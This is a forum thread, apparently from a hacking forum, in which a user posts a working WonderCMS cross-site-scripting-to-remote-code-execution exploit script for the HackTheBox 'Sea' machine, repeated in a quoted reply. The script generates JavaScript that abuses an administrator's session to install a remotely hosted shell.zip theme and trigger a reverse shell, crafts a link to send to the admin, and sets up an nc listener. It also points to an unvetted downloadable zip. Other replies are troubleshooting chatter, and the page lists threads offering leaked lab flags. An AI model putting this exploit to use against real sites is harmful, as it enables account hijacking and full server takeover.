HTB Sea - Working WonderCMS Exploit
by macavitysworld - Sunday August 11, 2024 at 12:07 PM
#1
Download the zip from here: https://files.catbox.moe/kpnh6q.zip and rename it as shell.zip

# Exploit: WonderCMS XSS to RCE Modified import sys import requests import os import bs4 if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252") else:   data = ''' var url = "'''+str(sys.argv[1])+'''"; if (url.endsWith("/")) { url = url.slice(0, -1); } var urlWithoutLog = "http://sea.htb"+url.split("/").slice(0, -1).join("/"); var urlWithoutLogBase = new URL(urlWithoutLog).pathname; var token = document.querySelectorAll('[name="token"]')[0].value; var urlRev = urlWithoutLogBase+"/?installModule=http://IP:PORT/shell.zip&directoryName=violet&type=themes&token=" + token; var xhr3 = new XMLHttpRequest(); xhr3.withCredentials = true; xhr3.open("GET", urlRev); xhr3.send(); xhr3.onload = function() { if (xhr3.status == 200) {   var xhr4 = new XMLHttpRequest();   xhr4.withCredentials = true;   xhr4.open("GET", urlWithoutLogBase+"/themes/shell/rev.php");   xhr4.send();   xhr4.onload = function() {     if (xhr4.status == 200) {       var ip = "'''+str(sys.argv[2])+'''";       var port = "'''+str(sys.argv[3])+'''";       var xhr5 = new XMLHttpRequest();       xhr5.withCredentials = true;       xhr5.open("GET", urlWithoutLogBase+"/themes/shell/rev.php?lhost=" + ip + "&lport=" + port);       xhr5.send();           }   }; } }; '''   try:     open("xss.js","w").write(data)     print("[+] xss.js is created")     print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))     print("----------------------------\n")     XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""     XSSlink = XSSlink.strip(" ")     print("send the below link to admin:\n\n----------------------------\n"+XSSlink)     print("----------------------------\n")     print("\nstarting HTTP server to allow the access to xss.js")     os.system("python3 -m http.server\n")   except: print(data,"\n","//write this to a file")


Run the exploit normally as mentioned.

python3 exploit.py http://sea.htb/loginURL IP PORT

and You should get reverse shell on your listening PORT
Reply
#2
(08-11-2024, 12:07 PM)macavitysworld Wrote: Download the zip from here: https://files.catbox.moe/kpnh6q.zip and rename it as shell.zip

# Exploit: WonderCMS XSS to RCE Modified import sys import requests import os import bs4 if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252") else:   data = ''' var url = "'''+str(sys.argv[1])+'''"; if (url.endsWith("/")) { url = url.slice(0, -1); } var urlWithoutLog = "http://sea.htb"+url.split("/").slice(0, -1).join("/"); var urlWithoutLogBase = new URL(urlWithoutLog).pathname; var token = document.querySelectorAll('[name="token"]')[0].value; var urlRev = urlWithoutLogBase+"/?installModule=http://IP:PORT/shell.zip&directoryName=violet&type=themes&token=" + token; var xhr3 = new XMLHttpRequest(); xhr3.withCredentials = true; xhr3.open("GET", urlRev); xhr3.send(); xhr3.onload = function() { if (xhr3.status == 200) {   var xhr4 = new XMLHttpRequest();   xhr4.withCredentials = true;   xhr4.open("GET", urlWithoutLogBase+"/themes/shell/rev.php");   xhr4.send();   xhr4.onload = function() {     if (xhr4.status == 200) {       var ip = "'''+str(sys.argv[2])+'''";       var port = "'''+str(sys.argv[3])+'''";       var xhr5 = new XMLHttpRequest();       xhr5.withCredentials = true;       xhr5.open("GET", urlWithoutLogBase+"/themes/shell/rev.php?lhost=" + ip + "&lport=" + port);       xhr5.send();           }   }; } }; '''   try:     open("xss.js","w").write(data)     print("[+] xss.js is created")     print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))     print("----------------------------\n")     XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""     XSSlink = XSSlink.strip(" ")     print("send the below link to admin:\n\n----------------------------\n"+XSSlink)     print("----------------------------\n")     print("\nstarting HTTP server to allow the access to xss.js")     os.system("python3 -m http.server\n")   except: print(data,"\n","//write this to a file")


Run the exploit normally as mentioned.

python3 exploit.py http://sea.htb/loginURL IP PORT

and You should get reverse shell on your listening PORT

Update

changing
var urlWithoutLogBase = "http://sea.htb";
also works
Reply
#3
It's not working sir
null
Reply
#4
(08-11-2024, 04:30 PM)raidenei Wrote: It's not working sir
null

dm me on discord or tg with your updated script or the generated xss.js
Reply
#5
not works for me
Reply
#6
(08-13-2024, 11:21 PM)sebagina Wrote: not works for me

Please dm me on telegram @macavitysworld
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 90,907 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 4,374 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 9,537 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 2,360 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 2,658 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)